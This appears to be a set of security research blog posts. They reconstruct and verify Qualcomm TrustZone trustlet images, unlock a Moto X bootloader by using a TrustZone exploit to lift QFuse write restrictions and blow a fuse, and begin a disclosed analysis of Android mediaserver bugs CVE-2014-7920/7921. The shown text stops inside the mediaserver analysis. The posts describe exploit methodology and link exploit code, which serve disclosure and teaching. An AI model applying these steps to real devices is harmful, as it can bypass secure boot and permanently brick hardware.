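    """Parse the 32-bit ELF header at the start of a trustlet's ".mdt" file."""
    if len(mdt) < ELF32_HEADER_SIZE or mdt[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    if mdt[4] != 1 or mdt[5] != 1:   # EI_CLASS == ELFCLASS32, EI_DATA == little-endian
        raise ValueError("expected a little-endian 32-bit ELF")
    e_phoff, = struct.unpack_from("<I", mdt, 0x1C)
    e_phentsize, e_phnum = struct.unpack_from("<HH", mdt, 0x2A)
    return {"e_phoff": e_phoff, "e_phentsize": e_phentsize, "e_phnum": e_phnum}

def block_file_names(name, e_phnum):
    """One ".bXX" file per program header: name.b00, name.b01, ..."""
    return ["%s.b%02d" % (name, i) for i in range(e_phnum)]
```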

Since the "e_phnum" field is usually used to specify the number of program headers, this hints that perhaps each of the ".bXX" files contains a single segment of the trustlet. Indeed, opening each of the files reveals content that seems like it may be a segment of the program being loaded... But in order to make sure, we'll need to find the program headers themselves (and see if they match the ".bXX" files).

Looking further, the next few chunks in the ".mdt" file are in fact the program headers themselves, one for each of the ".bXX" files present.

And, confirming our earlier suspicion, their sizes match the sizes of the ".bXX" files exactly. Great!

Note that the first two program headers above look a little strange - they are both NULL-type headers, meaning they are "reserved" and should not be loaded into the resulting ELF image. Strangely, opening the corresponding ".bXX" files reveals that the first block contains the same ELF header and program headers present in the ".mdt", and the second block contains the rest of the ".mdt" file.

In any case, here's a short schematic summing up what we know so far:

Also, note that since the ELF header and the program headers are all present in the ".mdt", we can use "readelf" in order to quickly dump the information about program headers in the trustlet:

At this point we have all the information we need in order to create a complete and valid ELF file from the ".mdt" and ".bXX" files; we have the ELF header and the program headers, as well as each of the segments themselves. We just need to write a small script that will create an ELF file using this data.
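Here is a minimal sketch of that idea. It assumes each ".bXX" blob is exactly `p_filesz` bytes long and belongs at its program header's `p_offset`. It illustrates the approach and is not the code of the script linked below.

```python
import struct

PHDR_FORMAT = "<8I"   # p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align

def read_program_headers(mdt):
    """Return (program_headers, end_of_headers) from the ELF32 header in the .mdt."""
    e_phoff, = struct.unpack_from("<I", mdt, 0x1C)
    e_phentsize, e_phnum = struct.unpack_from("<HH", mdt, 0x2A)
    phdrs = [struct.unpack_from(PHDR_FORMAT, mdt, e_phoff + i * e_phentsize)
             for i in range(e_phnum)]
    return phdrs, e_phoff + e_phnum * e_phentsize

def unify(mdt, blocks):
    """Rebuild one ELF image from the .mdt headers and the .bXX blobs (in header order)."""
    phdrs, headers_end = read_program_headers(mdt)
    if len(phdrs) != len(blocks):
        raise ValueError("expected one .bXX blob per program header")
    size = max([headers_end] + [ph[1] + ph[4] for ph in phdrs])
    image = bytearray(size)
    image[:headers_end] = mdt[:headers_end]   # ELF header + program headers
    for ph, blob in zip(phdrs, blocks):
        p_offset, p_filesz = ph[1], ph[4]
        if len(blob) != p_filesz:
            raise ValueError("blob size does not match p_filesz")
        image[p_offset:p_offset + p_filesz] = blob
    return bytes(image)
```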

I've written a small python script which does just that. You can find it here:

https://github.com/laginimaineb/unify_trustlet

Reflections on Trusting Trustlets

By now we have a basic understanding of how trustlets are assembled into an executable file, but we still don't know how they are verified. However, since we know the ".bXX" files contain only the segments to be loaded, the verification data must reside in the ".mdt" file.

So it's time for some guesswork - if we were to build a trusted loader, how would we do it?

One very common paradigm would be to use hash-and-sign, relying on a collision-resistant hash function (CRHF) and a digital signature. Essentially, we calculate the hash of the data to be authenticated and sign it using a private key for which the corresponding public key is known to the loader.

If that were the case, we'd expect to find two things in the ".mdt":

A certificate chain
A signature blob

Let's start by looking for a certificate chain. There are way too many formats for certificates, but since the ".mdt" file only contains binary data, we can assume it'll probably be a binary format, the most common of which is DER.

There's a quick hack we can use to find DER-encoded certificates - they almost always start with an "ASN.1 SEQUENCE" whose length is encoded in two bytes, which appears as: 0x30 0x82 (0x30 is the SEQUENCE tag, and 0x82 indicates that the next two bytes hold the length). So let's search for these two bytes in the ".mdt" and save each found blob into a file. Now, we can check if these blobs are well-formed certificates using "openssl":
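Below is a sketch of that search in Python. The function name is illustrative. Note that a certificate's inner TBSCertificate also starts with 0x30 0x82, so some hits are nested blobs that the openssl check will reject.

```python
def find_der_blobs(data):
    """Yield (offset, blob) for each 0x30 0x82 SEQUENCE whose two-byte length fits in `data`."""
    i = data.find(b"\x30\x82")
    while i != -1:
        if i + 4 <= len(data):
            length = int.from_bytes(data[i + 2:i + 4], "big")   # DER lengths are big-endian
            end = i + 4 + length
            if end <= len(data):
                yield i, data[i:end]
        i = data.find(b"\x30\x82", i + 1)
```

Each blob can then be written to a file and checked with `openssl x509 -inform DER -in blob.der -noout -text`.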

Yup, we guessed correctly - those are certificates.

In fact, the trustlet contains three certificates, one after the other. Just for good measure, we might also want to check that these three certificates are in fact a certificate chain which forms a valid chain of trust. We can do this by dumping the certificates to a single "certificate chain" file and using "openssl" to verify each certificate using this chain:

As for the root of trust of this chain - looking at the root certificate in the chain reveals the same root certificate which is used to verify all other parts of the boot chain in Qualcomm's "Secure Boot" process. There has been some research about this mechanism, which has shown that the validation occurs by comparing the SHA256 of the root certificate to a special value called "OEM_PK_HASH", which is "fused" into the device's QFuses during the production process. Since this value should theoretically not be modifiable after the production of the device, this means that forging such a root certificate would essentially require a second pre-image attack against SHA256.
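The check itself reduces to a hash comparison. The sketch below assumes the fused value is available as 32 raw bytes; reading the QFuses is not modelled. The constant-time comparison is a choice of this sketch, not something stated above.

```python
import hashlib
import hmac

def root_cert_matches_fuse(root_cert_der, oem_pk_hash):
    """Compare SHA256 of the DER-encoded root certificate with the fused OEM_PK_HASH."""
    return hmac.compare_digest(hashlib.sha256(root_cert_der).digest(), oem_pk_hash)
```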

Now, let's get back to the ".mdt" - we've found the certificate chain, so now it's time to look for a signature. Normally, the private key is used to produce a signature and the public key can be used to recover the signed data. Since we have the public key of the top-most certificate in the chain, we can use it to go over the file and opportunistically try to "recover" each blob.

But how will we know when we've succeeded?

Recall that RSA is a trapdoor permutation family - every blob with the same number of bits as the public modulus N is mapped to another blob of the same size.

However, while the RSA public modulus in our case is 2048 bits long, most hashes are much shorter than that (160 bits for SHA1, 256 bits for SHA256). This means that if we try to "decrypt" a blob using our public key and it happens to end with a lot of "slack" space (for example, zero bytes), there's a very good chance that this is the signature we're looking for (for a completely random permutation, the chance of n consecutive zero bits is 2^-n, which is extremely small for even a moderate n).

In order to do so, I wrote a small program which loads the public key from the top-most certificate in the chain and tries to "recover" each blob in the ".mdt" (using rsa_public_decrypt with PKCS #1 v1.5 padding). If the "recovered" blob ends with a bunch of zero bytes, the program outputs it. So... Running it on our ".mdt":
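Below is a sketch of the same search in pure Python. It swaps in raw (unpadded) RSA via the built-in `pow` instead of PKCS #1 v1.5 unpadding, so it simplifies the program described above. The threshold of eight trailing zero bytes is an arbitrary choice: a random result passes with probability of about 2^-64. The test uses a toy key built from two Mersenne primes, not a real 2048-bit key.

```python
def trailing_zero_bytes(b):
    return len(b) - len(b.rstrip(b"\x00"))

def find_signature_candidates(data, n, e, min_zero_bytes=8):
    """Apply the raw RSA public operation to every modulus-sized window of `data`.

    Reports (offset, recovered_bytes) for windows whose result ends with at
    least `min_zero_bytes` zero bytes.
    """
    k = (n.bit_length() + 7) // 8        # modulus size in bytes
    hits = []
    for off in range(len(data) - k + 1):
        s = int.from_bytes(data[off:off + k], "big")
        if s == 0 or s >= n:             # zero maps to zero; values >= n are not valid inputs
            continue
        m = pow(s, e, n).to_bytes(k, "big")
        if trailing_zero_bytes(m) >= min_zero_bytes:
            hits.append((off, m))
    return hits
```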

We've found a signature! Great.

What's more, the recovered data is 256 bits long, which implies that it may be a SHA256 hash... And if there's one SHA256 hash in the ".mdt", perhaps there are more?

Lucky once again!

As we can see, the SHA256 hashes for each of the ".bXX" files are also stored in the ".mdt", consecutively. We can also make an educated guess that this will be the data (or at least some of the data) that is signed to produce the signature we found earlier.
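Checking this takes one search per block. The sketch below (helper name illustrative) maps each ".bXX" file to the offset of its SHA256 digest in the ".mdt", or to None when the digest is absent, as for ".b01".

```python
import hashlib

def locate_block_hashes(mdt, blocks):
    """Map each .bXX index to the offset of its SHA256 digest in the .mdt, or None."""
    result = {}
    for i, block in enumerate(blocks):
        off = mdt.find(hashlib.sha256(block).digest())
        result[i] = off if off != -1 else None
    return result
```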

Note that the ".b01" file's hash is missing - why is that? Remember that the ".b01" file contains all the data in the ".mdt" other than the ELF header and program headers. Since this data also contains the signature above, and the signature is (possibly) produced over the hashes of the block files, this would cause a circular dependency (since changing the block file would change the hash, which would change the signature, which would again change the block file, etc.). So it makes sense that this block's hash wouldn't be present.

By now we've actually decoded all of the data in the ".mdt" file apart from a small structure which resides right after the program headers. However, after looking at it for a while, we can see that it simply contains pointers and lengths of the various parts of the ".mdt" that we've already decoded:

So finally, we've decoded all of the information in the ".mdt"... Phew.

Motorola's High Assurance Boot

Although the ".mdt" file format we've seen above is universal for all OEMs, Motorola decided to add a little twist.

Instead of supplying an RSA signature like the one we saw earlier, they actually leave the signature blob empty (in fact, the signature I showed you earlier was from a Nexus 5). Motorola's signature blob looks like this:

So how is the image verified?

This is done by using a mechanism which Motorola calls HAB ("High Assurance Boot"). This mechanism allows them to verify the ".mdt" file by appending a certificate chain and a signature over the whole ".mdt" to the end of the file, encoded using a proprietary format used by "HAB":

For more information about this mechanism, you can check out this great research by Tal Aloni. In short, the ".mdt" is hashed and signed using the top-most key in the certificate chain, while the root certificate in the chain is verified using a "Super Root Key", which is hard-coded in one of the bootloader's stages.

Life of a Trustlet

After the verification process we saw above, the TrustZone kernel loads the trustlet's segments into a secure memory region ("secapp-region") which is inaccessible from the "Normal World" and assigns an ID to it.

Then, the kernel switches into "Secure World" user-mode and executes the trustlet's entry function:

As you can see, the trustlet registers itself with the TrustZone kernel, along with a "handler function". After registering the trustlet, control is returned to the TrustZone kernel, and the loading process finishes.

Now, once the trustlet is loaded, the "Normal World" can send commands to the trustlet by issuing a special SCM call (called "QSEOS_CLIENT_SEND_DATA_COMMAND") containing the loaded trustlet's ID and the request and response buffers. Here's what it looks like:

The TrustZone kernel (TZBSP) receives the SCM call, maps it to QSEOS, which then finds the application with the given ID and calls the handler function which was registered earlier (from "Secure World" user-mode) in order to serve the request.

What's Next?

Now that we have some understanding of what trustlets are and how they are loaded, we can move on to the exploits! In the next blog post we'll find a vulnerability in a very popular trustlet and exploit it in order to execute code within QSEE.

Unlocking the Motorola Bootloader

2016-02-10T21:27:00.001+02:00

In this blog post, we'll explore the Motorola bootloader on recent Qualcomm Snapdragon devices. Our goal will be to unlock the bootloader of a Moto X (2nd Gen), by using the TrustZone kernel code execution vulnerability from the previous blog posts. Note that although we will show the complete unlocking process for this specific device, it should be general enough to work at least for most modern Motorola devices.

Why Motorola?

After reporting the previous TrustZone kernel privilege escalation to Qualcomm, I was gifted a shiny new Moto X. However... There was one little snag - they accidentally sent me a locked device. This was a completely honest mistake, and they did offer many times to unlock the device - but where's the fun in that? So without further ado, let's dive into the Motorola bootloader and see what it takes to unlock it.

Setting the Stage

Before we start our research, let's begin with a short introduction to the boot process - starting right at the point at which a device is powered on.

First - the PBL (Primary Boot Loader), also known as the "BootROM", is executed. Since the PBL is stored within an internal mask ROM, it cannot be modified or provisioned, and is therefore an intrinsic part of the device. As such, it serves only the minimal purpose of allowing the device to boot, and of authenticating and loading the next part of the boot-chain.

Then, two secondary bootloaders are loaded, SBL1 (Secondary Boot Loader), followed by SBL2. Their main responsibility is to boot up the various processors on the SoC and configure them so that they're ready to operate.

Next up in the boot-chain, the third and last secondary bootloader, SBL3, is loaded. This bootloader, among other tasks, verifies and loads the Android Bootloader - "aboot".

Now this is where we get to the part relevant for our unlocking endeavours; the Android Bootloader is the piece of software whose responsibility is, as its name suggests, to load the Android operating system and trigger its execution.

This is also the part of the boot-chain that OEMs tend to customize the most, mainly because while the first part of the boot-chain is written by Qualcomm and deals with SoC specifics, the Android bootloader can be used to configure the way the Android OS is loaded.

Among the features controlled by aboot is the "bootloader lock" - in other words, aboot is the first piece of the boot-chain which can opt to break the chain of trust (in which each bootloader stage verifies the next) and load an unsigned operating system.
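The chain of trust can be sketched as a loop in which each stage checks the next one before handing over control, with aboot being the one stage that may skip the check. This is a toy model under obvious assumptions: a SHA-256 allowlist stands in for the real signature verification, and the stage list simply mirrors the boot-chain described above (the PBL, living in mask ROM, is the implicit first verifier).

```python
import hashlib
from typing import List, Set, Tuple


def digest(image: bytes) -> str:
    # Stand-in for signature verification (assumption: real stages check signatures).
    return hashlib.sha256(image).hexdigest()


def boot(chain: List[Tuple[str, bytes]], trusted: Set[str], unlocked: bool) -> List[str]:
    """Load each stage in order; every stage verifies the one after it."""
    booted = []
    for i, (name, image) in enumerate(chain):
        loader = chain[i - 1][0] if i > 0 else "PBL"
        if loader == "aboot" and unlocked:
            pass  # aboot breaks the chain of trust on an unlocked device
        elif digest(image) not in trusted:
            raise RuntimeError(f"{loader} refused to load {name}")
        booted.append(name)
    return booted


signed = [(name, name.encode()) for name in ("SBL1", "SBL2", "SBL3", "aboot")]
trusted = {digest(image) for _, image in signed}
custom = signed + [("android", b"unsigned kernel")]
print(boot(custom, trusted, unlocked=True))
# prints ['SBL1', 'SBL2', 'SBL3', 'aboot', 'android']
```

With unlocked=False the same chain stops at aboot with a RuntimeError, which is exactly the lock we're after.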

For devices with an unlockable bootloader, the unlocking process is usually performed by rebooting the device into a special ("bootloader") mode, and issuing the relevant fastboot command. However, as we will later see, this interface is also handled by aboot. This means that not only does aboot query the lock status during the regular boot process, but it also houses the code responsible for the actual unlocking process.

As you may know, different OEMs take different stances on this issue. In short, "Nexus" devices always ship with an "unlockable" bootloader. In contrast, Samsung doesn't allow bootloader unlocking for most of its devices. Other OEMs, Motorola included, ship their devices locked, but certain devices deemed "eligible" can be unlocked using a "magic" (signed) token supplied by the OEM (although this also voids the warranty for most devices).

So... it's all very complex, but also irrelevant. That's because we're going to do the whole process manually - if aboot can control the lock status of the device, this means we should probably be able to do so as well, given an elevated enough set of privileges.

Getting Started

Now that we have a general grasp of the components involved and of our goal, the next stage is to analyse the actual aboot code.

Since the binaries for all stages of the boot-chain are contained within the factory firmware image, that would naturally be a good place to start. There are several download links available - here are a few. In case you would like to follow along with me, I'm going to refer to the symbols in the version "ATT_XT1097_4.4.4_KXE21.187-38".

After downloading the firmware image, we are faced with our first challenge - the images are all packed using a proprietary format, in a file called "motoboot.img". However, opening the file up in a hex-editor reveals it has a pretty simple format we can deduce:

As you can see above, the sought-after aboot image is stored within this file, along with the TrustZone image, and various stages of the boot-chain. Good.

After analysing the structure above, I've written a python script which can be used to unpack all the images from a given Motorola bootloader image; you can find it here.

Much ado aboot nothing

We'll start by inspecting the aboot image. Discouragingly, it is 1MB in size, so going over all of it would be a waste of time. However, as we've mentioned above, when booting the device into the special "bootloader" mode, the actual interaction with the user is provided by aboot itself. This means that we can start by searching for the strings which are displayed when the unlocking process is performed - and continue from there.

A short search for the "unlock..." string which is printed after starting the unlock process brings us straight to the function (@0xFF4B874) which deals with the unlocking logic:

That was pretty fast!

As you can see, after printing the string to the console, three functions are called consecutively, and if all three of them succeed, the device is considered unlocked.

Going over the last two functions reveals their purpose is to erase the user's data partitions (which is always performed after the bootloader is unlocked, in order to protect the device owner's privacy). In any case, this means they are irrelevant to the unlocking process itself and are simply side-effects.

This leaves us with a single function which, when called, should unlock the bootloader.

So does this mean we're done already? Can we just call this function and unlock the device?

Actually, not yet. Although the TrustZone exploit allows us to achieve code-execution within the TrustZone kernel, this is only done after the operating system is loaded, at which point, executing aboot code directly could cause all sorts of side-effects (since, for example, the code might assume that there is no operating system/the MMU could be disabled, etc.). And even if it were that simple, perhaps there is something interesting to be learned by fully understanding the locking mechanism itself.

Regardless, if we can understand the logic behind the code, we can simply emulate it ourselves, and perform the meaningful parts of it from our TrustZone exploit. Analysing the unlocking function reveals a surprisingly simple high-level logic:

Unfortunately, these two functions wreak havoc within IDA (which fails to even display a meaningful call-graph for them).

Manually analysing the functions reveals that they are in fact quite similar to one another. They both don't contain much logic of their own, but instead they prepare arguments and call the following function:

This is a little surprising - instead of handling the logic itself, this function issues an SMC (Secure Monitor Call) in order to invoke a TrustZone system-call from aboot itself (as we've discussed in previous blog posts)! In this case, both functions issue an SMC with the request code 0x3F801. Here is the relevant pseudo-code for each of them:

At this point we've gleaned all the information we need from aboot, so now let's switch over to the TrustZone kernel to find out what this SMC call does.

Enter Stage Left, TrustZone

Now that we've established that an SMC call is made with the command-code 0x3F801, we are left with the task of finding this command within the TrustZone kernel.

Going over the TrustZone kernel system calls, we arrive at the following entry:

This is a huge function which performs widely different tasks based on the first argument supplied, which we'll call the "command code" from now on.

It should be noted that an additional flag is passed into this system-call, indicating whether or not it was called from a "secure" context. This means that if we try invoking it from the Android OS itself, an argument will be passed marking our invocation as insecure, which will prevent us from performing these operations ourselves. Of course, we can get around this limitation using our TrustZone exploit, but we'll go into that later!
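Here's a rough sketch of that system-call shape: one entry point, behaviour selected by the command code, and a caller flag supplied by the TrustZone kernel rather than by the caller. The error codes and the make_syscall helper are hypothetical, chosen only for illustration.

```python
from typing import Callable, Dict

ERR_INSECURE_CALLER = -1   # hypothetical error codes
ERR_UNKNOWN_COMMAND = -2


def make_syscall(handlers: Dict[int, Callable[[int], int]]) -> Callable[[int, int, bool], int]:
    """Build a multiplexed system-call: one entry point, many commands."""

    def syscall(command: int, arg: int, from_secure: bool) -> int:
        # from_secure is filled in by the TrustZone kernel, not by the caller,
        # so an invocation coming from Android arrives marked as insecure.
        if not from_secure:
            return ERR_INSECURE_CALLER
        handler = handlers.get(command)
        if handler is None:
            return ERR_UNKNOWN_COMMAND
        return handler(arg)

    return syscall


syscall = make_syscall({1: lambda arg: arg + 1})
print(syscall(1, 41, True), syscall(1, 41, False))  # prints 42 -1
```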

As we've seen above, this SMC call is triggered twice, using the command codes #1 and #2 (I've annotated the functions below to improve readability):

In short, we can see both commands are used to read and write (respectively) values from something called a "QFuse".

QFuses

Much like a real-life fuse, a QFuse is a hardware component which facilitates a "one-time-writeable" piece of memory. Each fuse represents a single bit; fuses which are intact represent the bit zero, and "blown" fuses represent the bit one. However, as the name suggests, this operation is irreversible - once a fuse is blown it cannot be "un-blown".
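Since blowing a fuse can only turn a 0 into a 1, writing to a fuse row behaves like a bitwise OR. The following sketch models that; the 32-bit row width is an assumption for the example, not a documented QFuse property.

```python
class QFuseRow:
    """One-time-programmable row: bits can be blown (0 -> 1) but never cleared."""

    def __init__(self, width: int = 32) -> None:
        self.width = width   # assumed row width, for illustration only
        self.value = 0       # every fuse intact

    def blow(self, mask: int) -> None:
        if mask < 0 or mask >> self.width:
            raise ValueError("mask does not fit in the fuse row")
        self.value |= mask   # zero bits in the mask leave blown fuses alone

    def is_blown(self, bit: int) -> bool:
        return ((self.value >> bit) & 1) == 1


row = QFuseRow()
row.blow(0b101)
row.blow(0b010)
row.blow(0)            # "writing" zeros cannot un-blow anything
print(bin(row.value))  # prints 0b111
```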

Each SoC has its own arrangement of QFuses, each with its own unique purpose. Some fuses are already blown when a device is shipped, but others can be blown depending on the user's actions in order to change the way a specific device feature operates.

Unfortunately, the information regarding the role of each fuse is not public, and we are therefore left with the single option of reversing the various software components to try and deduce their role.

In our case, we call a specific function in order to decide which fuse we are going to read and write:

Since we call this function with the second syscall argument, in our case "4", this means we will operate on the fuse at address 0xFC4B86E8.

Putting it all together

Now that we understand the aboot and the TrustZone logic, we can put them together to get the full flow:

First, aboot calls SMC 0x3F801 with command-code #1

This causes the TrustZone kernel to read and return the QFuse at address 0xFC4B86E8

Then, iff the first bit in the QFuse is disabled, aboot calls SMC 0x3F801 once more, this time with command-code #2

This causes the TrustZone kernel to write the value 1 to the LSB of the aforementioned QFuse.
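The aboot side of this flow fits in a few lines. In the sketch below, smc(command_code, selector) is a hypothetical stand-in for issuing SMC 0x3F801, and treating a return value of 0 from command #2 as success is an assumption; the fuse address and the selector value 4 are the ones found above.

```python
from typing import Callable, Dict

FUSE_SELECTOR = 4            # second syscall argument seen in aboot
UNLOCK_FUSE = 0xFC4B86E8     # QFuse the selector maps to in the TrustZone kernel


def aboot_unlock(smc: Callable[[int, int], int]) -> bool:
    """Mirror of aboot's unlock logic: read the fuse, blow its LSB if needed."""
    value = smc(1, FUSE_SELECTOR)            # command #1: read the QFuse
    if value & 1:                            # LSB already blown: already unlocked
        return True
    return smc(2, FUSE_SELECTOR) == 0        # command #2: blow the LSB


# Fake TrustZone side for trying the logic out (hypothetical).
fuses: Dict[int, int] = {UNLOCK_FUSE: 0}
SELECTOR_TO_FUSE = {FUSE_SELECTOR: UNLOCK_FUSE}


def fake_smc(command: int, selector: int) -> int:
    address = SELECTOR_TO_FUSE[selector]
    if command == 1:
        return fuses[address]
    if command == 2:
        fuses[address] |= 1                  # fuses can only be blown, never cleared
        return 0
    return -1


print(aboot_unlock(fake_smc), hex(fuses[UNLOCK_FUSE]))  # prints True 0x1
```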

Turns out to be very simple after all - we just need to set a single bit in a single QFuse, and the bootloader will be considered unlocked.

But how can QFuses be written?

DIY QFuses

Luckily, the TrustZone kernel exposes a pair of system-calls which allow us to read and write a restricted set of QFuses - tzbsp_qfprom_read_row and tzbsp_qfprom_write_row, respectively. If we can lift those restrictions using our TrustZone exploit, we should be able to use this API in order to blow the wanted QFuse.

Let's take a look at these restrictions within the tzbsp_qfprom_write_row system-call:

So first, there's a DWORD at 0xFE823D5C which must be set to zero in order for the function's logic to continue. Normally this flag is in fact set to one, thus preventing the usage of the QFuse calls, but we can easily enough overwrite the flag using the TrustZone exploit.

Then, an additional function is called, which is used to make sure that the ranges of fuses being written are "allowed":

As we can see, this function goes over a static list of pairs, each denoting the start and end address of the allowed QFuses. This means that in order to pass this check, we can overwrite this static list to include all QFuses (setting the start address to zero and the end address to the maximal QFuse relative address - 0xFFFF).
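Both checks, and why overwriting them is enough, can be modelled as follows. The flag stands for the DWORD at 0xFE823D5C; the initial allowed range, the 4-byte write size and treating the end address as inclusive are all hypothetical details made up for the example.

```python
from typing import List, Tuple


class QfpromWriteModel:
    """Toy model of the two checks in tzbsp_qfprom_write_row."""

    def __init__(self) -> None:
        self.calls_disabled = 1                                    # DWORD at 0xFE823D5C
        self.allowed: List[Tuple[int, int]] = [(0x00A0, 0x00AF)]   # hypothetical pairs

    def range_allowed(self, start: int, end: int) -> bool:
        # The write must fall entirely inside one (start, end) pair.
        return any(lo <= start and end <= hi for lo, hi in self.allowed)

    def write_row(self, rel_addr: int, size: int = 4) -> bool:
        if self.calls_disabled != 0:
            return False
        return self.range_allowed(rel_addr, rel_addr + size - 1)


gate = QfpromWriteModel()
print(gate.write_row(0x1234))        # False: the flag blocks everything
gate.calls_disabled = 0              # first overwrite from TrustZone
gate.allowed = [(0x0000, 0xFFFF)]    # second overwrite: allow every QFuse
print(gate.write_row(0x1234))        # True
```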

Trying it out

Now that we have everything figured out, it's time to try it out ourselves! I've written some code which does the following:

Achieves code-execution within TrustZone
Disables the QFuse protections
Blows the LSB of the QFuse at 0xFC4B86E8

I encourage you to check out the code here: https://github.com/laginimaineb/Alohamora

Have fun!

Final Thoughts

In this blog post we went over the flow controlled by a single QFuse. But, as you can probably guess, there are many different interesting QFuses out there, waiting to be discovered.

On the one hand, blowing a fuse is really "dangerous" - making one small mistake can permanently brick your device. On the other hand, some fuses might facilitate a special set of features that we would like to enable.

One such example is the "engineering" fuse; this fuse is mentioned throughout the aboot image, and can be used to enable an amazing range of capabilities such as skipping secure boot, loading unsigned peripheral images, having an unsigned GPT, and much more.

However, this fuse is blown in all consumer devices, marking the device as a "non-engineer" device, and disabling these features. But who knows, maybe there are other fuses which are just as important, which have not yet been discovered...

Android privilege escalation to mediaserver from zero permissions (CVE-2014-7920 + CVE-2014-7921)

2016-01-24T15:54:00.002+02:00

In this blog post we'll go over two vulnerabilities I discovered which, when combined, enable arbitrary code execution within the "mediaserver" process from any context, requiring no permissions whatsoever.

How bad is it?

The first vulnerability (CVE-2014-7921) was present in all Android versions from 4.0.3 onwards. The second vulnerability (CVE-2014-7920) was present in all Android versions from 2.2 (!). Also, these vulnerabilities are not vendor-specific and were present in all Android devices. Since the first vulnerability is only needed to bypass ASLR, and ASLR is only present (in a meaningful form) from Android 4.1 onwards, this means that these vulnerabilities allow code execution within "mediaserver" on any Android device starting from version 2.2.

Although I reported both vulnerabilities in mid October 2014, they were unfortunately only fixed much later (see "Timeline" for full description, below) - in Android version 5.1! This means that there are many devices out there which are still vulnerable to these issues, so please take care.

You can find the actual patches here. The patches were pushed to AOSP five months after the vulnerabilities were reported.

That said, the Android security team was very pleasant to work with, and with other vulnerabilities I reported later on, they were much more responsive and managed to solve the issues within a shorter time-frame.

Where are we at?

Continuing our journey of getting from zero permissions to TrustZone code execution; after recently completing the task of getting to TrustZone from the Linux kernel, and after finding a way to gain code execution within the Linux kernel, we are left with the final step of gaining the privileges needed in order to execute our kernel exploit.

As mentioned in the previous blog post in the series, in order to exploit the kernel vulnerability in the "qseecom" driver, an attacker need only satisfy one of the following conditions:

Gain execution within one of "mediaserver", "drmserver", "surfaceflinger" or "keystore"
Run within a process with the "system", "drm" or "keystore" user-ID
Run within a process with the "drmrpc" group-ID

In this blog post, we'll gain code execution within the "mediaserver" process, thus completing our journey from zero permissions to TrustZone kernel code execution.

Diving in

As its name suggests, the "mediaserver" process is in charge of all media-related tasks. In order to serve different media-related requests, the process exposes a large set of features in the form of four different services:

"media.audio_policy" - Enables manipulation of different audio related policies, such as the volumes of different audio streams
"media.audio_flinger" - Main configuration endpoint for media-related tasks, such as recording audio, muting the phone, etc.
"media.camera" - Allows interaction with the device's cameras.
"media.player" - Allows the playback of many different media formats (for example, by using the "stagefright" library).

As you've probably seen, lately there's been a lot of focus on the "media.player" service (à la Stagefright), especially on the different media-parsing libraries which it utilises. However, in this post we'll cover two vulnerabilities in a different service - the "media.audio_policy" service.

Usually, when registering an Android service, the actual implementation of the service is provided in the Java programming language. This means that finding memory corruption vulnerabilities is more difficult, since those would only present themselves in unique circumstances (using a native "JNI" call from Java code, delegating a feature to a native library, etc.).

However, in the case of the "mediaserver" process, all of the services housed within the process are implemented in the C++ programming language, making the prospect of finding memory corruptions much more viable.

Actually, implementing a service is quite a hard task to fulfil in a secure manner - recall when we previously discussed kernel vulnerabilities? Well, in order to prevent accidental access to user-provided data, the kernel uses a coding convention in which user-provided pointers are marked as "tainted". However, for interaction between userspace services, there is no such feature. This means that implementers of a service must always pay attention to the origin of the processed data, and can't trust it at all.

Let's get down to business

Here's the game plan - first of all, we'll need to look for a memory corruption vulnerability in the audio policy service. Then, we'll need to find a way to reliably exploit this vulnerability. This is usually made difficult by the presence of ASLR.

For those of you who haven't encountered ASLR (Address Space Layout Randomization) yet, you should definitely check this link for Android-specific information (and this link to see the problems still present in Android's ASLR implementation).

Now, without any further ado, let's take a look at the functionality exposed by the audio policy service. Unsurprisingly, we'll start at the "main" function of the "mediaserver" process:

Looks straightforward enough. However, looking deeper reveals that while both "AudioPolicyService" and "AudioFlinger" register themselves as the handlers for commands directed at the "media.audio_policy" and "media.audio_flinger" services respectively, they actually act as façades for the real concrete implementation, which is provided after going through several layers of abstraction.

The end result is that the actual implementation for most functionality provided by "AudioPolicyService" and some of the functionality provided by "AudioFlinger" are in fact handled by a single class - "AudioPolicyManagerBase". As a result, this is the class we're going to be focusing on from now on.

Limited Write Primitive

Whenever a user would like to start an output stream on a particular output device (such as the front or back speakers), he may do so by calling the "startOutput" function, provided by the audio policy service.

This function receives three arguments:

The output descriptor - this must be a device (such as the front or back speakers).
The type of stream for which the output should be opened (should be one of the predefined stream types).
The session ID - this should be a number corresponding to a previously opened session.

Initially, the function verifies the "output" parameter by fetching the AudioOutputDescriptor object corresponding to the given output device. This means that this argument must, in fact, be valid.

But what about the other two arguments? Well, peering a little further reveals the following call:

Doesn't seem too shady, but let's just make sure the stream argument is safely handled:

Oh.

So - as we can see above, the function uses the "stream" argument as an index into an array (of 32-bit values) within the AudioOutputDescriptor object - and both reads and writes to that address, without ever sanitizing the stream number. We're off to a good start already!

In reality, there are only a handful of valid stream_type values (it is in fact an enumerated type), so adding appropriate validation is as easy as checking that the given argument is within the enumeration's minimal and maximal values:
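A minimal sketch of such a check. AUDIO_STREAM_CNT is an assumed value here; the real bound should be taken from the stream-type enumeration of the targeted Android version, and change_ref_count_checked is a hypothetical, simplified model of a validated changeRefCount.

```python
from typing import List

AUDIO_STREAM_CNT = 10  # assumption: number of stream types on the target version


def is_valid_stream(stream: int) -> bool:
    # Reject anything outside [0, AUDIO_STREAM_CNT) before it is used as an index.
    return 0 <= stream < AUDIO_STREAM_CNT


def change_ref_count_checked(ref_counts: List[int], stream: int, delta: int) -> bool:
    """Simplified changeRefCount with the missing bounds check added."""
    if not is_valid_stream(stream):
        return False  # refuse instead of indexing past the mRefCount array
    # Going below zero resets the count to zero, as in the original logic.
    ref_counts[stream] = max(ref_counts[stream] + delta, 0)
    return True


counts = [0] * AUDIO_STREAM_CNT
print(change_ref_count_checked(counts, 3, 1), change_ref_count_checked(counts, 0x1000, 1))
# prints True False
```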

Regardless - there are still some constraints we need to figure out. First and foremost, in order to avoid unnecessary side-effects, we would like to choose an output descriptor which is not "duplicated" (so as not to execute the first block). Luckily, this is easy - most output descriptors are in fact not duplicated by default.

Moving on, when would the second block in this function execute? Well, since the "delta" argument is always 1, this means we'll enter the block iff (int)mRefCount[stream] + 1 is negative. In other words, this happens if the value pointed to is larger than or equal to 0x7FFFFFFF (since we're dealing with a 32-bit system).
